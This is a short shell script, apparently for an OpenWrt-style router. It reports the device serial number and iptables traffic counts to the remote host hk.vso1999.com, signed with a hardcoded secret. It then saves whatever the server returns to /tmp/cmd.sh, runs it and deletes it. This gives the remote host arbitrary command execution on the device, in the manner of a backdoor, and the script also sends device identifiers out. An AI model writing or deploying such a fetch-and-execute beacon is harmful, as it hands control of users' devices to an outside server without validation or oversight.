#!/bin/sh

param=$(uci get system.@system[0].sn)
nonce=$(cat /proc/sys/kernel/random/uuid | md5sum |cut -c1-20)
secret="lsakdjfk234879jkdwfh!@1238"
# 获取 output_rule 的流量值
traffic=$(iptables -L OUTPUT -n -v -x | grep "output_rule" | awk '{print $2}')
param_traffic="${param},${traffic}"


signature=$(echo -n "${param_traffic}${nonce}${secret}" | md5sum | awk '{print $1}')

response=$(curl -s "http://hk.vso1999.com:8080/api/getRun?param=${param_traffic}&nonce=${nonce}&sign=${signature}")
iptables -Z
if [ -n "$response" ]; then
  echo "$response" > /tmp/cmd.sh
  chmod +x /tmp/cmd.sh
  /tmp/cmd.sh
  rm /tmp/cmd.sh
fi

exit 0